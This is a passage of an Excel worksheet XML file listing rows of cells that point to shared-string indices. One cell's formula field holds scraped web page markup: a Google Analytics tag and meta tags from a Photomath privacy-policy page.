      <c r="B9743" t="s">
        <v>4586</v>
      </c>
    </row>
    <row r="9744" spans="1:2">
      <c r="A9744" t="s">
        <v>181</v>
      </c>
      <c r="B9744" t="s">
        <v>4587</v>
      </c>
    </row>
    <row r="9745" spans="1:2">
      <c r="A9745" t="s">
        <v>181</v>
      </c>
      <c r="B9745" t="s">
        <v>4562</v>
      </c>
    </row>
    <row r="9746" spans="1:2">
      <c r="A9746" t="s">
        <v>181</v>
      </c>
      <c r="B9746" t="s">
        <v>4563</v>
      </c>
    </row>
    <row r="9747" spans="1:2">
      <c r="A9747" t="s">
        <v>181</v>
      </c>
      <c r="B9747" t="s">
        <v>4564</v>
      </c>
    </row>
    <row r="9748" spans="1:2">
      <c r="A9748" t="s">
        <v>181</v>
      </c>
      <c r="B9748" t="s">
        <v>4565</v>
      </c>
    </row>
    <row r="9749" spans="1:2">
      <c r="A9749" t="s">
        <v>181</v>
      </c>
      <c r="B9749" t="s">
        <v>4566</v>
      </c>
    </row>
    <row r="9750" spans="1:2">
      <c r="A9750" t="s">
        <v>181</v>
      </c>
      <c r="B9750" t="s">
        <v>4567</v>
      </c>
    </row>
    <row r="9751" spans="1:2">
      <c r="A9751" t="s">
        <v>181</v>
      </c>
      <c r="B9751" t="s">
        <v>4568</v>
      </c>
    </row>
    <row r="9752" spans="1:2">
      <c r="A9752" t="s">
        <v>181</v>
      </c>
      <c r="B9752" t="s">
        <v>4569</v>
      </c>
    </row>
    <row r="9753" spans="1:2">
      <c r="A9753" t="s">
        <v>181</v>
      </c>
      <c r="B9753" t="s">
        <v>4570</v>
      </c>
    </row>
    <row r="9754" spans="1:2">
      <c r="A9754" t="s">
        <v>181</v>
      </c>
      <c r="B9754" t="s">
        <v>4571</v>
      </c>
    </row>
    <row r="9755" spans="1:2">
      <c r="A9755" t="s">
        <v>181</v>
      </c>
      <c r="B9755" t="s">
        <v>4572</v>
      </c>
    </row>
    <row r="9756" spans="1:2">
      <c r="A9756" t="s">
        <v>181</v>
      </c>
      <c r="B9756" t="s">
        <v>4573</v>
      </c>
    </row>
    <row r="9757" spans="1:2">
      <c r="A9757" t="s">
        <v>181</v>
      </c>
      <c r="B9757" t="s">
        <v>4574</v>
      </c>
    </row>
    <row r="9758" spans="1:2">
      <c r="A9758" t="s">
        <v>181</v>
      </c>
      <c r="B9758" t="s">
        <v>4575</v>
      </c>
    </row>
    <row r="9759" spans="1:2">
      <c r="A9759" t="s">
        <v>181</v>
      </c>
      <c r="B9759" t="s">
        <v>4576</v>
      </c>
    </row>
    <row r="9760" spans="1:2">
      <c r="A9760" t="s">
        <v>181</v>
      </c>
      <c r="B9760" t="s">
        <v>4577</v>
      </c>
    </row>
    <row r="9761" spans="1:2">
      <c r="A9761" t="s">
        <v>181</v>
      </c>
      <c r="B9761" t="s">
        <v>4578</v>
      </c>
    </row>
    <row r="9762" spans="1:2">
      <c r="A9762" t="s">
        <v>181</v>
      </c>
      <c r="B9762" t="s">
        <v>4579</v>
      </c>
    </row>
    <row r="9763" spans="1:2">
      <c r="A9763" t="s">
        <v>181</v>
      </c>
      <c r="B9763" t="s">
        <v>4580</v>
      </c>
    </row>
    <row r="9764" spans="1:2">
      <c r="A9764" t="s">
        <v>181</v>
      </c>
      <c r="B9764" t="s">
        <v>4581</v>
      </c>
    </row>
    <row r="9765" spans="1:2">
      <c r="A9765" t="s">
        <v>181</v>
      </c>
      <c r="B9765" t="s">
        <v>4582</v>
      </c>
    </row>
    <row r="9766" spans="1:2">
      <c r="A9766" t="s">
        <v>181</v>
      </c>
      <c r="B9766" t="s">
        <v>4583</v>
      </c>
    </row>
    <row r="9767" spans="1:2">
      <c r="A9767" t="s">
        <v>181</v>
      </c>
      <c r="B9767" t="s">
        <v>4584</v>
      </c>
    </row>
    <row r="9768" spans="1:2">
      <c r="A9768" t="s">
        <v>181</v>
      </c>
      <c r="B9768" t="s">
        <v>4585</v>
      </c>
    </row>
    <row r="9769" spans="1:2">
      <c r="A9769" t="s">
        <v>181</v>
      </c>
      <c r="B9769" t="s">
        <v>4586</v>
      </c>
    </row>
    <row r="9770" spans="1:2">
      <c r="A9770" t="s">
        <v>181</v>
      </c>
      <c r="B9770" t="s">
        <v>4587</v>
      </c>
    </row>
    <row r="9771" spans="1:2">
      <c r="A9771" t="s">
        <v>181</v>
      </c>
      <c r="B9771" t="s">
        <v>4562</v>
      </c>
    </row>
    <row r="9772" spans="1:2">
      <c r="A9772" t="s">
        <v>181</v>
      </c>
      <c r="B9772" t="s">
        <v>4563</v>
      </c>
    </row>
    <row r="9773" spans="1:2">
      <c r="A9773" t="s">
        <v>181</v>
      </c>
      <c r="B9773" t="s">
        <v>4564</v>
      </c>
    </row>
    <row r="9774" spans="1:2">
      <c r="A9774" t="s">
        <v>181</v>
      </c>
      <c r="B9774" t="s">
        <v>4565</v>
      </c>
    </row>
    <row r="9775" spans="1:2">
      <c r="A9775" t="s">
        <v>181</v>
      </c>
      <c r="B9775" t="s">
        <v>4566</v>
      </c>
    </row>
    <row r="9776" spans="1:2">
      <c r="A9776" t="s">
        <v>181</v>
      </c>
      <c r="B9776" t="s">
        <v>4567</v>
      </c>
    </row>
    <row r="9777" spans="1:2">
      <c r="A9777" t="s">
        <v>181</v>
      </c>
      <c r="B9777" t="s">
        <v>4568</v>
      </c>
    </row>
    <row r="9778" spans="1:2">
      <c r="A9778" t="s">
        <v>181</v>
      </c>
      <c r="B9778" t="s">
        <v>4569</v>
      </c>
    </row>
    <row r="9779" spans="1:2">
      <c r="A9779" t="s">
        <v>181</v>
      </c>
      <c r="B9779" t="s">
        <v>4570</v>
      </c>
    </row>
    <row r="9780" spans="1:2">
      <c r="A9780" t="s">
        <v>181</v>
      </c>
      <c r="B9780" t="s">
        <v>4571</v>
      </c>
    </row>
    <row r="9781" spans="1:2">
      <c r="A9781" t="s">
        <v>181</v>
      </c>
      <c r="B9781" t="s">
        <v>4572</v>
      </c>
    </row>
    <row r="9782" spans="1:2">
      <c r="A9782" t="s">
        <v>181</v>
      </c>
      <c r="B9782" t="s">
        <v>4573</v>
      </c>
    </row>
    <row r="9783" spans="1:2">
      <c r="A9783" t="s">
        <v>181</v>
      </c>
      <c r="B9783" t="s">
        <v>4574</v>
      </c>
    </row>
    <row r="9784" spans="1:2">
      <c r="A9784" t="s">
        <v>181</v>
      </c>
      <c r="B9784" t="s">
        <v>4575</v>
      </c>
    </row>
    <row r="9785" spans="1:2">
      <c r="A9785" t="s">
        <v>181</v>
      </c>
      <c r="B9785" t="s">
        <v>4576</v>
      </c>
    </row>
    <row r="9786" spans="1:2">
      <c r="A9786" t="s">
        <v>181</v>
      </c>
      <c r="B9786" t="s">
        <v>4577</v>
      </c>
    </row>
    <row r="9787" spans="1:2">
      <c r="A9787" t="s">
        <v>181</v>
      </c>
      <c r="B9787" t="s">
        <v>4578</v>
      </c>
    </row>
    <row r="9788" spans="1:2">
      <c r="A9788" t="s">
        <v>181</v>
      </c>
      <c r="B9788" t="s">
        <v>4579</v>
      </c>
    </row>
    <row r="9789" spans="1:2">
      <c r="A9789" t="s">
        <v>181</v>
      </c>
      <c r="B9789" t="s">
        <v>4580</v>
      </c>
    </row>
    <row r="9790" spans="1:2">
      <c r="A9790" t="s">
        <v>181</v>
      </c>
      <c r="B9790" t="s">
        <v>4581</v>
      </c>
    </row>
    <row r="9791" spans="1:2">
      <c r="A9791" t="s">
        <v>181</v>
      </c>
      <c r="B9791" t="s">
        <v>4582</v>
      </c>
    </row>
    <row r="9792" spans="1:2">
      <c r="A9792" t="s">
        <v>181</v>
      </c>
      <c r="B9792" t="s">
        <v>4583</v>
      </c>
    </row>
    <row r="9793" spans="1:2">
      <c r="A9793" t="s">
        <v>181</v>
      </c>
      <c r="B9793" t="s">
        <v>4584</v>
      </c>
    </row>
    <row r="9794" spans="1:2">
      <c r="A9794" t="s">
        <v>181</v>
      </c>
      <c r="B9794" t="s">
        <v>4585</v>
      </c>
    </row>
    <row r="9795" spans="1:2">
      <c r="A9795" t="s">
        <v>181</v>
      </c>
      <c r="B9795" t="s">
        <v>4586</v>
      </c>
    </row>
    <row r="9796" spans="1:2">
      <c r="A9796" t="s">
        <v>181</v>
      </c>
      <c r="B9796" t="s">
        <v>4587</v>
      </c>
    </row>
    <row r="9797" spans="1:2">
      <c r="A9797" t="s">
        <v>182</v>
      </c>
      <c r="B9797" t="s">
        <v>4588</v>
      </c>
    </row>
    <row r="9798" spans="1:2">
      <c r="A9798" t="s">
        <v>182</v>
      </c>
      <c r="B9798" t="s">
        <v>4589</v>
      </c>
    </row>
    <row r="9799" spans="1:2">
      <c r="A9799" t="s">
        <v>182</v>
      </c>
      <c r="B9799" t="s">
        <v>4590</v>
      </c>
    </row>
    <row r="9800" spans="1:2">
      <c r="A9800" t="s">
        <v>182</v>
      </c>
      <c r="B9800" t="s">
        <v>4591</v>
      </c>
    </row>
    <row r="9801" spans="1:2">
      <c r="A9801" t="s">
        <v>182</v>
      </c>
      <c r="B9801" t="s">
        <v>3643</v>
      </c>
    </row>
    <row r="9802" spans="1:2">
      <c r="A9802" t="s">
        <v>182</v>
      </c>
      <c r="B9802" t="s">
        <v>3644</v>
      </c>
    </row>
    <row r="9803" spans="1:2">
      <c r="A9803" t="s">
        <v>182</v>
      </c>
      <c r="B9803" t="s">
        <v>3645</v>
      </c>
    </row>
    <row r="9804" spans="1:2">
      <c r="A9804" t="s">
        <v>182</v>
      </c>
      <c r="B9804" t="s">
        <v>3646</v>
      </c>
    </row>
    <row r="9805" spans="1:2">
      <c r="A9805" t="s">
        <v>182</v>
      </c>
      <c r="B9805" t="s">
        <v>3647</v>
      </c>
    </row>
    <row r="9806" spans="1:2">
      <c r="A9806" t="s">
        <v>182</v>
      </c>
      <c r="B9806" t="s">
        <v>3648</v>
      </c>
    </row>
    <row r="9807" spans="1:2">
      <c r="A9807" t="s">
        <v>182</v>
      </c>
      <c r="B9807" t="s">
        <v>3649</v>
      </c>
    </row>
    <row r="9808" spans="1:2">
      <c r="A9808" t="s">
        <v>182</v>
      </c>
      <c r="B9808" t="s">
        <v>3650</v>
      </c>
    </row>
    <row r="9809" spans="1:2">
      <c r="A9809" t="s">
        <v>182</v>
      </c>
      <c r="B9809" t="s">
        <v>3651</v>
      </c>
    </row>
    <row r="9810" spans="1:2">
      <c r="A9810" t="s">
        <v>182</v>
      </c>
      <c r="B9810" t="s">
        <v>3652</v>
      </c>
    </row>
    <row r="9811" spans="1:2">
      <c r="A9811" t="s">
        <v>182</v>
      </c>
      <c r="B9811" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="9812" spans="1:2">
      <c r="A9812" t="s">
        <v>182</v>
      </c>
      <c r="B9812" t="s">
        <v>3654</v>
      </c>
    </row>
    <row r="9813" spans="1:2">
      <c r="A9813" t="s">
        <v>182</v>
      </c>
      <c r="B9813" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="9814" spans="1:2">
      <c r="A9814" t="s">
        <v>182</v>
      </c>
      <c r="B9814" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="9815" spans="1:2">
      <c r="A9815" t="s">
        <v>182</v>
      </c>
      <c r="B9815" t="s">
        <v>3657</v>
      </c>
    </row>
    <row r="9816" spans="1:2">
      <c r="A9816" t="s">
        <v>182</v>
      </c>
      <c r="B9816" t="s">
        <v>3658</v>
      </c>
    </row>
    <row r="9817" spans="1:2">
      <c r="A9817" t="s">
        <v>182</v>
      </c>
      <c r="B9817" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="9818" spans="1:2">
      <c r="A9818" t="s">
        <v>182</v>
      </c>
      <c r="B9818" t="s">
        <v>3660</v>
      </c>
    </row>
    <row r="9819" spans="1:2">
      <c r="A9819" t="s">
        <v>182</v>
      </c>
      <c r="B9819" t="s">
        <v>3661</v>
      </c>
    </row>
    <row r="9820" spans="1:2">
      <c r="A9820" t="s">
        <v>182</v>
      </c>
      <c r="B9820" t="s">
        <v>3662</v>
      </c>
    </row>
    <row r="9821" spans="1:2">
      <c r="A9821" t="s">
        <v>182</v>
      </c>
      <c r="B9821" t="s">
        <v>3663</v>
      </c>
    </row>
    <row r="9822" spans="1:2">
      <c r="A9822" t="s">
        <v>182</v>
      </c>
      <c r="B9822" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="9823" spans="1:2">
      <c r="A9823" t="s">
        <v>182</v>
      </c>
      <c r="B9823" t="s">
        <v>3665</v>
      </c>
    </row>
    <row r="9824" spans="1:2">
      <c r="A9824" t="s">
        <v>182</v>
      </c>
      <c r="B9824" t="s">
        <v>3666</v>
      </c>
    </row>
    <row r="9825" spans="1:2">
      <c r="A9825" t="s">
        <v>182</v>
      </c>
      <c r="B9825" t="s">
        <v>3667</v>
      </c>
    </row>
    <row r="9826" spans="1:2">
      <c r="A9826" t="s">
        <v>182</v>
      </c>
      <c r="B9826" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="9827" spans="1:2">
      <c r="A9827" t="s">
        <v>182</v>
      </c>
      <c r="B9827" t="s">
        <v>3669</v>
      </c>
    </row>
    <row r="9828" spans="1:2">
      <c r="A9828" t="s">
        <v>182</v>
      </c>
      <c r="B9828" t="s">
        <v>3670</v>
      </c>
    </row>
    <row r="9829" spans="1:2">
      <c r="A9829" t="s">
        <v>182</v>
      </c>
      <c r="B9829" t="s">
        <v>3671</v>
      </c>
    </row>
    <row r="9830" spans="1:2">
      <c r="A9830" t="s">
        <v>182</v>
      </c>
      <c r="B9830" t="s">
        <v>3672</v>
      </c>
    </row>
    <row r="9831" spans="1:2">
      <c r="A9831" t="s">
        <v>182</v>
      </c>
      <c r="B9831" t="s">
        <v>3673</v>
      </c>
    </row>
    <row r="9832" spans="1:2">
      <c r="A9832" t="s">
        <v>182</v>
      </c>
      <c r="B9832" t="s">
        <v>2724</v>
      </c>
    </row>
    <row r="9833" spans="1:2">
      <c r="A9833" t="s">
        <v>182</v>
      </c>
      <c r="B9833" t="s">
        <v>3674</v>
      </c>
    </row>
    <row r="9834" spans="1:2">
      <c r="A9834" t="s">
        <v>182</v>
      </c>
      <c r="B9834" t="s">
        <v>3675</v>
      </c>
    </row>
    <row r="9835" spans="1:2">
      <c r="A9835" t="s">
        <v>182</v>
      </c>
      <c r="B9835" t="s">
        <v>3676</v>
      </c>
    </row>
    <row r="9836" spans="1:2">
      <c r="A9836" t="s">
        <v>182</v>
      </c>
      <c r="B9836" t="s">
        <v>3677</v>
      </c>
    </row>
    <row r="9837" spans="1:2">
      <c r="A9837" t="s">
        <v>182</v>
      </c>
      <c r="B9837" t="s">
        <v>3678</v>
      </c>
    </row>
    <row r="9838" spans="1:2">
      <c r="A9838" t="s">
        <v>182</v>
      </c>
      <c r="B9838" t="s">
        <v>3679</v>
      </c>
    </row>
    <row r="9839" spans="1:2">
      <c r="A9839" t="s">
        <v>182</v>
      </c>
      <c r="B9839" t="s">
        <v>3680</v>
      </c>
    </row>
    <row r="9840" spans="1:2">
      <c r="A9840" t="s">
        <v>182</v>
      </c>
      <c r="B9840" t="s">
        <v>3681</v>
      </c>
    </row>
    <row r="9841" spans="1:2">
      <c r="A9841" t="s">
        <v>182</v>
      </c>
      <c r="B9841" t="s">
        <v>3682</v>
      </c>
    </row>
    <row r="9842" spans="1:2">
      <c r="A9842" t="s">
        <v>182</v>
      </c>
      <c r="B9842" t="s">
        <v>3683</v>
      </c>
    </row>
    <row r="9843" spans="1:2">
      <c r="A9843" t="s">
        <v>182</v>
      </c>
      <c r="B9843" t="s">
        <v>3684</v>
      </c>
    </row>
    <row r="9844" spans="1:2">
      <c r="A9844" t="s">
        <v>182</v>
      </c>
      <c r="B9844" t="s">
        <v>3685</v>
      </c>
    </row>
    <row r="9845" spans="1:2">
      <c r="A9845" t="s">
        <v>182</v>
      </c>
      <c r="B9845" t="s">
        <v>3686</v>
      </c>
    </row>
    <row r="9846" spans="1:2">
      <c r="A9846" t="s">
        <v>182</v>
      </c>
      <c r="B9846" t="s">
        <v>3687</v>
      </c>
    </row>
    <row r="9847" spans="1:2">
      <c r="A9847" t="s">
        <v>182</v>
      </c>
      <c r="B9847" t="s">
        <v>4592</v>
      </c>
    </row>
    <row r="9848" spans="1:2">
      <c r="A9848" t="s">
        <v>182</v>
      </c>
      <c r="B9848" t="s">
        <v>4593</v>
      </c>
    </row>
    <row r="9849" spans="1:2">
      <c r="A9849" t="s">
        <v>182</v>
      </c>
      <c r="B9849" t="s">
        <v>4594</v>
      </c>
    </row>
    <row r="9850" spans="1:2">
      <c r="A9850" t="s">
        <v>183</v>
      </c>
      <c r="B9850" t="s">
        <v>4595</v>
      </c>
    </row>
    <row r="9851" spans="1:2">
      <c r="A9851" t="s">
        <v>183</v>
      </c>
      <c r="B9851" t="s">
        <v>4596</v>
      </c>
    </row>
    <row r="9852" spans="1:2">
      <c r="A9852" t="s">
        <v>183</v>
      </c>
      <c r="B9852" t="s">
        <v>4597</v>
      </c>
    </row>
    <row r="9853" spans="1:2">
      <c r="A9853" t="s">
        <v>183</v>
      </c>
      <c r="B9853" t="s">
        <v>4598</v>
      </c>
    </row>
    <row r="9854" spans="1:2">
      <c r="A9854" t="s">
        <v>183</v>
      </c>
      <c r="B9854" t="s">
        <v>4599</v>
      </c>
    </row>
    <row r="9855" spans="1:2">
      <c r="A9855" t="s">
        <v>183</v>
      </c>
      <c r="B9855" t="s">
        <v>4600</v>
      </c>
    </row>
    <row r="9856" spans="1:2">
      <c r="A9856" t="s">
        <v>183</v>
      </c>
      <c r="B9856" t="s">
        <v>4601</v>
      </c>
    </row>
    <row r="9857" spans="1:2">
      <c r="A9857" t="s">
        <v>184</v>
      </c>
      <c r="B9857" t="s">
        <v>630</v>
      </c>
    </row>
    <row r="9858" spans="1:2">
      <c r="A9858" t="s">
        <v>184</v>
      </c>
      <c r="B9858" t="s">
        <v>4602</v>
      </c>
    </row>
    <row r="9859" spans="1:2">
      <c r="A9859" t="s">
        <v>184</v>
      </c>
      <c r="B9859" t="s">
        <v>4603</v>
      </c>
    </row>
    <row r="9860" spans="1:2">
      <c r="A9860" t="s">
        <v>184</v>
      </c>
      <c r="B9860" t="s">
        <v>4604</v>
      </c>
    </row>
    <row r="9861" spans="1:2">
      <c r="A9861" t="s">
        <v>184</v>
      </c>
      <c r="B9861" t="s">
        <v>4605</v>
      </c>
    </row>
    <row r="9862" spans="1:2">
      <c r="A9862" t="s">
        <v>184</v>
      </c>
      <c r="B9862" t="s">
        <v>4606</v>
      </c>
    </row>
    <row r="9863" spans="1:2">
      <c r="A9863" t="s">
        <v>185</v>
      </c>
      <c r="B9863" t="s">
        <v>4607</v>
      </c>
    </row>
    <row r="9864" spans="1:2">
      <c r="A9864" t="s">
        <v>185</v>
      </c>
      <c r="B9864" t="s">
        <v>4608</v>
      </c>
    </row>
    <row r="9865" spans="1:2">
      <c r="A9865" t="s">
        <v>185</v>
      </c>
      <c r="B9865">
        <f> window.dataLayer || [];
            function gtag() {
                dataLayer.push(arguments);
            }
            gtag('js', new Date());
            gtag('config', 'UA-56130223-3');
        &lt;/script&gt;
		&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;link rel="alternate" hreflang="en" href="https://photomath.com/en/privacypolicy" /&gt;
&lt;link rel="alternate" hreflang="it" href="https://photomath.com/it/privacypolicy" /&gt;
&lt;link rel="alternate" hreflang="pt-pt" href="https://photomath.com/pt/privacypolicy" /&gt;
&lt;link rel="alternate" hreflang="x-default" href="https://photomath.com/en/privacypolicy" /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;link rel="canonical" href="https://photomath.com/en/privacypolicy" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Photomath" /&gt;
	&lt;meta property="og:description" content="As part of our ongoing efforts to improve our Service, we have updated our Privacy Policy, which now better reflects our privacy standards, as well as offers greater transparency about the data we collect and the way we use it.</f>
        <v>0</v>
      </c>
    </row>
    <row r="9866" spans="1:2">
      <c r="A9866" t="s">
        <v>185</v>
      </c>
      <c r="B9866" t="s">
        <v>4609</v>
      </c>
    </row>
    <row r="9867" spans="1:2">
      <c r="A9867" t="s">
        <v>185</v>
      </c>
      <c r="B9867" t="s">
        <v>4610</v>
      </c>
    </row>
    <row r="9868" spans="1:2">
      <c r="A9868" t="s">
        <v>185</v>
      </c>
      <c r="B9868" t="s">
        <v>643</v>
      </c>
    </row>
    <row r="9869" spans="1:2">
      <c r="A9869" t="s">
        <v>185</v>
      </c>
      <c r="B9869" t="s">
        <v>721</v>
      </c>
    </row>
    <row r="9870" spans="1:2">
      <c r="A9870" t="s">
        <v>185</v>
      </c>
      <c r="B9870" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="9871" spans="1:2">
      <c r="A9871" t="s">
        <v>185</v>
      </c>
      <c r="B9871" t="s">
        <v>722</v>
      </c>
    </row>
    <row r="9872" spans="1:2">
      <c r="A9872" t="s">
        <v>185</v>
      </c>
      <c r="B9872" t="s">
        <v>723</v>
      </c>
    </row>
    <row r="9873" spans="1:2">
      <c r="A9873" t="s">
        <v>185</v>
      </c>
      <c r="B9873" t="s">
        <v>724</v>
      </c>
    </row>
    <row r="9874" spans="1:2">
      <c r="A9874" t="s">
        <v>185</v>
      </c>
      <c r="B9874" t="s">
        <v>725</v>
      </c>
    </row>
    <row r="9875" spans="1:2">
      <c r="A9875" t="s">
        <v>185</v>
      </c>
      <c r="B9875" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="9876" spans="1:2">
      <c r="A9876" t="s">
        <v>185</v>
      </c>
      <c r="B9876" t="s">
        <v>654</v>
      </c>
    </row>
    <row r="9877" spans="1:2">
      <c r="A9877" t="s">
        <v>185</v>
      </c>
      <c r="B9877" t="s">
        <v>655</v>
      </c>
    </row>
    <row r="9878" spans="1:2">
      <c r="A9878" t="s">
        <v>185</v>
      </c>
      <c r="B9878" t="s">
        <v>656</v>
      </c>
    </row>
    <row r="9879" spans="1:2">
      <c r="A9879" t="s">
        <v>185</v>
      </c>
      <c r="B9879" t="s">
        <v>727</v>
      </c>
    </row>
    <row r="9880" spans="1:2">
      <c r="A9880" t="s">
        <v>185</v>
      </c>
      <c r="B9880" t="s">
        <v>728</v>
      </c>
    </row>
    <row r="9881" spans="1:2">
      <c r="A9881" t="s">
        <v>185</v>
      </c>
      <c r="B9881" t="s">
        <v>729</v>
      </c>
    </row>
    <row r="9882" spans="1:2">
      <c r="A9882" t="s">
        <v>185</v>
      </c>
      <c r="B9882" t="s">
        <v>730</v>
      </c>
    </row>
    <row r="9883" spans="1:2">
      <c r="A9883" t="s">
        <v>185</v>
      </c>
      <c r="B9883" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="9884" spans="1:2">
      <c r="A9884" t="s">
        <v>185</v>
      </c>
      <c r="B9884" t="s">
        <v>732</v>
      </c>
    </row>
    <row r="9885" spans="1:2">
      <c r="A9885" t="s">
        <v>185</v>
      </c>
      <c r="B9885" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="9886" spans="1:2">
      <c r="A9886" t="s">
        <v>185</v>
      </c>
      <c r="B9886" t="s">
        <v>734</v>
      </c>
    </row>
    <row r="9887" spans="1:2">
      <c r="A9887" t="s">
        <v>185</v>
      </c>
      <c r="B9887" t="s">
        <v>735</v>
      </c>
    </row>
    <row r="9888" spans="1:2">
      <c r="A9888" t="s">
        <v>185</v>
      </c>
      <c r="B9888" t="s">
        <v>736</v>
      </c>
    </row>
    <row r="9889" spans="1:2">
      <c r="A9889" t="s">
        <v>185</v>
      </c>
      <c r="B9889" t="s">
        <v>4611</v>
      </c>
    </row>
    <row r="9890" spans="1:2">
      <c r="A9890" t="s">
        <v>185</v>
      </c>
      <c r="B9890" t="s">
        <v>4612</v>
      </c>
    </row>
    <row r="9891" spans="1:2">
      <c r="A9891" t="s">
        <v>185</v>
      </c>
      <c r="B9891" t="s">
        <v>4613</v>
      </c>
    </row>
    <row r="9892" spans="1:2">
      <c r="A9892" t="s">
        <v>185</v>
      </c>
      <c r="B9892" t="s">
        <v>4614</v>
      </c>
    </row>
    <row r="9893" spans="1:2">
      <c r="A9893" t="s">
        <v>64</v>
      </c>
      <c r="B9893" t="s">
        <v>1756</v>
      </c>
    </row>
    <row r="9894" spans="1:2">
      <c r="A9894" t="s">
        <v>64</v>
      </c>
      <c r="B9894" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="9895" spans="1:2">
      <c r="A9895" t="s">
        <v>64</v>
      </c>
      <c r="B9895" t="s">
        <v>1758</v>
      </c>
    </row>
    <row r="9896" spans="1:2">
      <c r="A9896" t="s">
        <v>64</v>
      </c>
      <c r="B9896" t="s">
        <v>1759</v>
      </c>
    </row>
    <row r="9897" spans="1:2">
      <c r="A9897" t="s">
        <v>64</v>
      </c>
      <c r="B9897" t="s">
        <v>1760</v>
      </c>
    </row>
    <row r="9898" spans="1:2">
      <c r="A9898" t="s">
        <v>64</v>
      </c>
      <c r="B9898" t="s">
        <v>1761</v>
      </c>
    </row>
    <row r="9899" spans="1:2">
      <c r="A9899" t="s">
        <v>64</v>
      </c>
      <c r="B9899" t="s">
        <v>1762</v>
      </c>
    </row>
    <row r="9900" spans="1:2">
      <c r="A9900" t="s">
        <v>64</v>
      </c>
      <c r="B9900" t="s">
        <v>1763</v>
      </c>
    </row>
    <row r="9901" spans="1:2">
      <c r="A9901" t="s">
        <v>64</v>
      </c>
      <c r="B9901" t="s">
        <v>1764</v>
      </c>
    </row>
    <row r="9902" spans="1:2">
      <c r="A9902" t="s">
        <v>64</v>
      </c>
      <c r="B9902" t="s">
        <v>1765</v>
      </c>
    </row>
    <row r="9903" spans="1:2">
      <c r="A9903" t="s">
        <v>64</v>
      </c>
      <c r="B9903" t="s">
        <v>1766</v>
      </c>
    </row>
    <row r="9904" spans="1:2">
      <c r="A9904" t="s">
        <v>64</v>
      </c>
      <c r="B9904" t="s">
        <v>1767</v>
      </c>
    </row>
    <row r="9905" spans="1:2">
      <c r="A9905" t="s">
        <v>64</v>
      </c>
      <c r="B9905" t="s">
        <v>1768</v>
      </c>
    </row>
    <row r="9906" spans="1:2">
      <c r="A9906" t="s">
        <v>64</v>
      </c>
      <c r="B9906" t="s">
        <v>1769</v>
      </c>
    </row>
    <row r="9907" spans="1:2">
      <c r="A9907" t="s">
        <v>33</v>
      </c>
      <c r="B9907" t="s">
        <v>1129</v>
      </c>
    </row>
    <row r="9908" spans="1:2">
      <c r="A9908" t="s">
        <v>33</v>
      </c>
      <c r="B9908" t="s">
        <v>1130</v>
      </c>
    </row>
    <row r="9909" spans="1:2">
      <c r="A9909" t="s">
        <v>33</v>
      </c>
      <c r="B9909" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="9910" spans="1:2">
      <c r="A9910" t="s">
        <v>33</v>
      </c>
      <c r="B9910" t="s">
        <v>1132</v>
      </c>
    </row>
    <row r="9911" spans="1:2">
      <c r="A9911" t="s">
        <v>33</v>
      </c>
      <c r="B9911" t="s">
        <v>1133</v>
      </c>
    </row>
    <row r="9912" spans="1:2">
      <c r="A9912" t="s">
        <v>33</v>
      </c>
      <c r="B9912" t="s">
        <v>1134</v>
      </c>
    </row>
    <row r="9913" spans="1:2">
      <c r="A9913" t="s">
        <v>33</v>
      </c>
      <c r="B9913" t="s">
        <v>1135</v>
      </c>
    </row>
    <row r="9914" spans="1:2">
      <c r="A9914" t="s">
        <v>33</v>
      </c>
      <c r="B9914" t="s">
        <v>1136</v>
      </c>
    </row>
    <row r="9915" spans="1:2">
      <c r="A9915" t="s">
        <v>33</v>
      </c>
      <c r="B9915" t="s">
        <v>1137</v>
      </c>
    </row>
    <row r="9916" spans="1:2">
      <c r="A9916" t="s">
        <v>33</v>
      </c>
      <c r="B9916" t="s">
        <v>1138</v>
      </c>
    </row>
    <row r="9917" spans="1:2">
      <c r="A9917" t="s">
        <v>33</v>
      </c>
      <c r="B9917" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="9918" spans="1:2">
      <c r="A9918" t="s">
        <v>33</v>
      </c>
      <c r="B9918" t="s">
        <v>1140</v>
      </c>
    </row>
    <row r="9919" spans="1:2">
      <c r="A9919" t="s">
        <v>33</v>
      </c>
      <c r="B9919" t="s">
        <v>1141</v>
      </c>
    </row>
    <row r="9920" spans="1:2">
      <c r="A9920" t="s">
        <v>33</v>
      </c>
      <c r="B9920" t="s">
        <v>1142</v>
      </c>
    </row>
    <row r="9921" spans="1:2">
      <c r="A9921" t="s">
        <v>33</v>
      </c>
      <c r="B9921" t="s">
        <v>1143</v>
      </c>
    </row>
    <row r="9922" spans="1:2">
      <c r="A9922" t="s">
        <v>33</v>
      </c>
      <c r="B9922" t="s">
        <v>1144</v>
      </c>
    </row>
    <row r="9923" spans="1:2">
      <c r="A9923" t="s">
        <v>33</v>
      </c>
      <c r="B9923" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="9924" spans="1:2">
      <c r="A9924" t="s">
        <v>33</v>
      </c>
      <c r="B9924" t="s">
        <v>1146</v>
      </c>
    </row>
    <row r="9925" spans="1:2">
      <c r="A9925" t="s">
        <v>33</v>
      </c>
      <c r="B9925" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="9926" spans="1:2">
      <c r="A9926" t="s">
        <v>33</v>
      </c>
      <c r="B9926" t="s">
        <v>1148</v>
      </c>
    </row>
    <row r="9927" spans="1:2">
      <c r="A9927" t="s">
        <v>33</v>
      </c>
      <c r="B9927" t="s">
        <v>1149</v>
      </c>
    </row>
    <row r="9928" spans="1:2">
      <c r="A9928" t="s">
        <v>33</v>
      </c>
